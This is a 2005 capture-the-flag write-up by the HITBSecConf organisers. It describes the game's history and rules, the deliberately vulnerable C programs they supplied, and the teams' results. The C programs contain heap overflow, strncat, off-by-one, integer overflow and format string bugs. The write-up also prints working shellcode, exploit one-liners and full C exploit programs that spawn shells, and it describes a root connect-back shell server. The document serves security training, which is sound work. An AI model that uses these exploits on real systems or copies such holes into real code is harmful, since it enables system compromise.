how to win the hitbseconf ctf game

spoonfork (mel@hackinthebox.org)
alphademon (alphademon@hackinthebox.org)
october 2005
todo: update with team's solutions

a short history

hitbsecconf2002 - the first ctf game. attack-only. targets were vulnerable windows, linux and freebsd servers. i was a member of the winning team.
infosec2003 - the second ctf game. same setup as the hitbsecconf2002. winner was the same team as in 2002.
hitbsecconf2003 - followed the ghettohackers concept for defcon. the organization of the game was quite chaotic. the score server was a bunch of perl scripts. the only team that chose windows2000 as their OS was guaranteed instant elimination. rm -rf / were rampant. m0s (whose members continued to participate in the 2004 and 2005 started to dominate) won.
hitbsecconf2004 -this time we went stupid. the services were limited, and there wasn't any available public vulnerabilities for the teams to play with. it was a boring game, but the winner was evident from the 1st game day. 1st (which include members of m0s) won.

this years, we decided to provide vulnerable source code, and let the teams write exploits. it was getting boring seeing teams firing up nessus and nmap year after year.

NOTE: unlike the defcon ctf game, we have no qualifying round. so year after year, we weren't sure of the team's technical skills - which make for a rather interesing mix. the debate every year was setting the difficulty level of the game. expecting teams to write exploit may back fire, but we went ahead with the plan this year anyway. this year, none of the teams were aware that they need to write exploits.

this year's setup

rules: rules are the same as the past two years. however, the game play focuses more on exploit-writing and code-auditing as opposed to kitchen sink hacking (nessus, nmap and nikto scans, and packetstorm exploit archives). more points were given for exploit-writing.
the bugs: the bugs and custom daemons were written by fyodor (fyodor@o0o.nu) and meder (meder@o0o.nu). i made small modifications to the daemons and wrote server01.
each team's server are identical. this means that every team have the same bugs and vulnerabilities, and the same set of services running, and the same set of services checked by the score server, regardless of wether the team chose Gentoo Linux or FreeBSD as their OS choice.

the teams

panda - members consisted of participants (and winners) in 2002, 2003, and 2004. security consultants.
eagles - sig^2 members from singapore. technically, one of the best teams this year even though they got 4th placing
trio - sig^2 members from singapore.
duo - security consultants
cls - security consultants
voompa, oompa, genin, chinin - students from utp and uitm. winners of the OSHACK hacking competition.

the custom bugs and daemons

bug01.c - heap overflow
bug02.c - strncat() bug
bug03.c - off-by-one problem
bug04.c - integer overflow vulnerability
daemon01.c - user input buffer overflow
daemon02.c - format string
server01.c - connect back server
the modified thttpd server - this server was modified by meder (meder@o0o.nu) which contains buffer overflow bugs in 404 error checking. none of the teams are able to identify this, or exploit the bug even after the hints were given.

all source codes can be downloaded here.

the services

none of the services are vulnerable, or at least have any 0days that we are aware of.

mysql - we let it bind on port 127.0.0.1, and most teams were puzzled as to why they were seeing red even though mysql was running.
rsync - was there for the heck of it
samba - was there but the score server didn't check it
smtp - this was the latest stable version of sendmail for both freebsd and gentoo linux. was there for the heck of it
apache - apache2 for both linux and freebsd. was there for the coolness factor. no web application was running here as well

bug01.c

/*
 * Type of vulnerability: Heap Overflow. Overflow will happen when
 * the length of argv[1] string is shorter than NAME constant. This this
 * case malloc() allocates smaller amount of data is malloc'ed. And strncpy
 * will attempt to copy "negative" amount of data (negative number will be
 * converted into a large positive due to size_t being defined as unsigned
 * integer). On certain architectures additional manipulation with the heap
 * data is required to make this bug exploitable.
 *
 */
#include 
#define NAME "name:"

int main (int argc, char *argv[]) {
    char *buf;

    if (argc !=2) return 1;
    if (strncmp(NAME, argv[1], strlen(NAME))> 0) {
        buf = (char *)malloc(strlen(argv[1]));
        strncpy(buf, argv[1] + strlen(NAME), strlen(argv[1]) - strlen(NAME));
        printf(" %s copied\n", buf);
        /* may require additional heap data manipulation here */
        free(buf);
    }
    return 1;
}

none of the teams are able to exploit this bug. in fact it is not exploitable (in freebsd 5.4). it is however, possibly exploitable in linux.

bug02.c

/*
 * Type of vulnerability: typical 'strncat' usage bug. strncat will use
 * at most BUFSIZ characters from the s2 here. Overflow may be triggered 
 * during the second call of catbuf() function, if argv[1] is large enough.
 *
 */
#include 


int catbuf(char *s1, char *s2) {
    strncat(s1, s2, BUFSIZ);

}
int main(int argc, char *argv[]) {

    char buf[BUFSIZ + 1];
    bzero(buf, BUFSIZ);

    if (argc > 2) catbuf(buf, argv[1]);
    if (argc > 2) catbuf(buf, argv[1]);

    return 0;
}

this is the easies bug to exploit. panda, du0 and eagles managed to write exploit for this. i wonder why the n00bies from UTP and UITM are not able to exploit this bug. both panda and eagles wrote exploits for both linux and freebsd for bug02.c

panda's solution (freebsd)

(root@panda)[196] /home/bug02 # ./bug02 `ruby -e 'print "\x90" *
524;print "BBBB"'` A A
zsh: segmentation fault (core dumped)  ./bug02 `ruby -e 'print "\x90"
* 524;print "BBBB"'` A A

(root@panda)[197] /home/bug02 # gdb -c bug02.core bug02
GNU gdb 6.1.1 [FreeBSD]
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-marcel-freebsd"...(no debugging
symbols found)...
Core was generated by `bug02'.
Program terminated with signal 11, Segmentation fault.
Reading symbols from /lib/libc.so.5...(no debugging symbols found)...done.
Loaded symbols for /lib/libc.so.5
Reading symbols from /libexec/ld-elf.so.1...(no debugging symbols
found)...done.
Loaded symbols for /libexec/ld-elf.so.1
#0  0x42424242 in ?? ()
(gdb)


(root@panda)[253] /home/bug02 # ./bug02 `ruby -e 'print
"\x31\xc0\x50\xb0\x17\x50\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80";print
"\x90" * 493;print "\x5c\xec\xbf\xbf"'` A A
# quit

panda's solution (linux)

xwings@montana.$ gcc -o bug02 bug02.c
xwings@montana.$ ./bug02 `ruby -e 'print "A" * 4108;print "BBBB"'` A
Segmentation fault (core dumped)
xwings@montana.$ gdb -c core ./bug02
GNU gdb 6.3
Copyright 2004 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i486-slackware-linux"...Using host
libthread_db library "/lib/libthread_db.so.1".

Core was generated by `./bug02
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 11, Segmentation fault.

warning: current_sos: Can't read pathname for load map: Input/output error

Reading symbols from /lib/libc.so.6...done.
Loaded symbols for /lib/libc.so.6
Reading symbols from /lib/ld-linux.so.2...done.
Loaded symbols for /lib/ld-linux.so.2
#0  0x42424242 in ?? ()
(gdb) quit

xwings@montana.$ ./bug02 `ruby -e 'print
"\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80";print
"\x90" * 4074;print "\xa0\x44\x8b\xbf"'` A
sh-3.00$

bug03.c

/*
 * This code is demonstrating off-by-one problem. snprintf() of Solaris'
 * libc requires an extra byte to be reserved for '\0' character at the end
 * of the string. The loop after the string does the same thing. 
 *
 */
#include 

void offone(char *s) {
    char buf[BUFSIZ];
    int i;

    snprintf(buf, BUFSIZ,"%s", s); // vulnerable on Solaris
    for (i = 0; i <= BUFSIZ || s[i] == 0; i++) 
        buf[i] = s[i]; // all other platforms
    printf("%s", buf);
}

int main(int argc, char *argv[]) {
    if (argc > 1) offone(argv[1]);
}

interestingly, panda (the winning team) told me that this bug is not exploitable. in fact, quite a number of people told me that it was impossible to exploit. on the second day, eagles exploited it, and so did panda.

eagle's solution (linux)

#include <stdio.h>
#include <unistd.h>
#include <string.h>

char SHELLCODE[] =
"\x90\x90\xeb\x1f\x5e\x89\x76\x09\x31\xc0\x88\x46"
"\x08\x89\x46\xd0\xb0\x0b\x89\xf3\x8d\x4e\x09\x8d"
"\x56\x0d\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8"
"\xdc\xff\xff\xff/bin/sh";

int main()
{
        char paddedsc[1024];
        char *env[] = {paddedsc, NULL};
        char astring[BUFSIZ + 1];
        int i;

        for (i = 0; i < sizeof(paddedsc) - 1; i++) { paddedsc[i] = 0x90; }
        strncpy(paddedsc, "EGG=", 4);
        strcpy(&paddedsc[500], SHELLCODE);

        for (i = 0; i < sizeof(astring) - 1; i+=4) {
                int *addr = (int*) &astring[i];
                *addr = 0xbffffdd4;
        }
        astring[sizeof(astring) - 1] = 0;

        execle("./vuln", "./vuln", astring, NULL, env);
        return 0;
}

bug04.c

/*
 * Type of vulnerability: integer overflow bug. When argv[1] length is
 * larger than 65535 bytes, len gets truncated to (actuallen - 65535) and 
 * condition len > sizeof(buf) becomes true. (unsigned short could
 * be replaced with simple unsigned, just the length of the string should
 * be longer for overflow to take pplace).
 *
 *
 */
#include 

void func(char *s, unsigned short len) {
    char buf[256];

    if (len > sizeof(buf)) strncpy(buf, s, sizeof(buf));
    else strcpy(buf, s);
}

   
int main(int argc, char *argv[]) {
    int len;
    if (argc < 2) return 0;
    len = strlen(argv[1]);
    func(argv[1], len);
    return 0;
}

both panda and eagles were able to write exploit for this.

panda's solution (linux exploit)

#include <stdlib.h>
#define BUF 65537
#define VULN "./bug4"

//char shellcode[]=
//"\x31\xc0\x50\xb0\x17\x50\xcd\x80"
//"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
//"\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80";

char shellcode[] =
"\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xb0\x2e\xcd\x80"
"\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
"\x99\x52\x53\x89\xe1\xb0\x0b\xcd\x80";


int main(int argc, char *argv[])
{
        int i;
        char *ptr, buffer[BUF];
        long *addr_ptr, ret;
        char *env[2] = {shellcode, NULL};

        ptr = buffer;
        addr_ptr = (long *) ptr;

        ret = 0xbffffffa - strlen(shellcode) - strlen(VULN);
        printf("Using ret = 0x%x\n\n", ret);

        for(i = 0; i < BUF; i += 4)
                *(addr_ptr++) = ret;

        memcpy(ptr, shellcode, strlen(shellcode));
        ptr += strlen(shellcode);

        buffer[BUF - 1] = '\0';
        execle(VULN, VULN + 2, buffer, 0, env);
}

daemon01.c

this custom daemon was provided by fyodor (fyodor@o0o.nu) with small modifications by spoonfork (mel@hackinthebox.org). the daemon has a buffer overflow in the socketr() routine. panda was able to come up with a poc for the bug. none of the other teams are able to show anything, not even a poc. source.

panda's poc (linux)

EHLO AAAA%p%p%p%p%p%p (aot of %p), you will be able to find the marker.

daemon02.c

this custom daemon was provided by fyodor (fyodor@o0o.nu) with small modifications by spoonfork (mel@hackinthebox.org). the daemon has a format string vulnerability that can be passed directly to vsnprintf() function call. panda, again, was able to show a poc for this. the other teams sucked at auditing codes. i wonder wether they can even point out where the bug was. source.

panda's poc (linux)

EHLO AAAA%p%p%p%p%p%p (aot of %p), you will be able to find the marker.

server01.c

the idea was given by charl (charl@sensepost.com) when alphademon and i met him at bcs2005 in jakarta. this is a simple connect back server that listens on port 3490 and will connect back to you on port 39909 and give you root shell (as it was running with root privileges) when you connect to it. unfortunately, none of the teams were able to figure out what it actually does. we even gave hints like "ET call home" on the second day of the game. source.

what we saw during the conf

team panda was definitely the more organized and l33t team. they were leading since day 1, and wrote exploits for bug02, bug03, bug04, daemon01 and deamon02. being the leading team, they were also heavily attacked by the n00bies from utp. at one point on the second day, team du0 managead to overtake them. however, what set them apart is their exploit-writing skills.
their members were also no stranger to the ctf game. slash participated in hitbsecconf2002 and infosec2003. riaf participated in hitbsecconf2003 and hitbsecconf2004, while xwings participated in hitbsecconf2004.
it was amazing how most of the teams still rely on nessus, nmap, amap, nikto and metasploit. on the first day of the game i told one of the participants from utp that there was no point running nessus. but i still saw teams running nikto, nmap and metasploit. really, the point of this year's ctf game is not to test skills using available tools, but on your exploit-writing skills.

how to win the ctf

master buffer overlow
master gdb
master C
and most important of all - exploit writing skills
defend once, and defend well. a good defensive strategy will enable teams to focus on exploit development without worrying too much about offensive from other teams.

loopholes of the ctf game

teams can gang up. eagles and panda gave each other shell accounts on their servers. the utp teams were working together in attacking both eagles and panda.
we tried to differentiate between offensive and defensive points. however, teams that defend well (without really putting much effort in exploit development had a good chance of getting 2nd or 3rd placing). du0 got second place because they have been defensive all the way, while eagle fell from 3rd to 4th place because 3 of their services were always down, despite them having exploits for bug02, bug03 and bug04. on the second day, panda was heavily attacked was in the brink of getting second placing. since now we're able to gauge the team's strengths and skills, score may be changed in the future to put more weightage on effective offensive scores.
we said no internet access were provided, but one team brought their own jaring wireless broadband somaport and enjoyed internet access during the game. however, because we provided custom vulnerabilities and daemon, that internet access was kinda useless.
DoS were prevented by rate-limiting the participants network. however, server to server network was not rate-limited. this means that participants can use their servers to DoS other teams' servers. this was one of the thing that we can't prevent.
all participants are on the same LAN segment. there is no rules against participants attacking each other.
there was no rule against creating vmware snapshot, and reverting back to the snapshot if your server was fux0red.

how to improve the game

introduce more custom (as opposed to publicly known) bugs written in C, PHP, Perl, Python and other languages
improve on the scoring system. a heavier weightage should be given to offensive score than defensive score
simulate a real network, besides the participants server network
emphasize on exploit writing by giving more points to teams that write exploit modules for metasploit
improve scoring by deducting points from teams that utilize scanners such as nessus and nikto
give points for patches

some ideas that were discussed, but never implemented in this year's ctf game

flags hidden in images using steganography
flags hidden in filesystem using the grugq's file hiding techniques
flags hidden in packets on the ctf network
custom web application with several vulnerabilities - i actually wrote one in PHP but for the life of me i don't know where i put the code

greetz

fyodor and meder, dave aitel, team panda, ilsor, alphaque, adli, yomuds, gaius, sys64738, divine shadow, nish bhalla, belinda choong, jim geovedi, joanna rutkowska, l33tdawg, amygoh, biatch0, tony chor and the ms ie team, tim pritlove and the ccc crew, sk, xfocus crew, red dragon, leewen and mmu crew, paulooi, prabu, niresh and mydefcon crew, sheeraj shah, mikko of f-secure, the grugq, raoul, jose and marius, fabrice marie, swaraj, zubair khan, roelof, rohyt belani, marc schoenefeld, aaron higbee, and the rest of the hitbsecconf2005 crew members.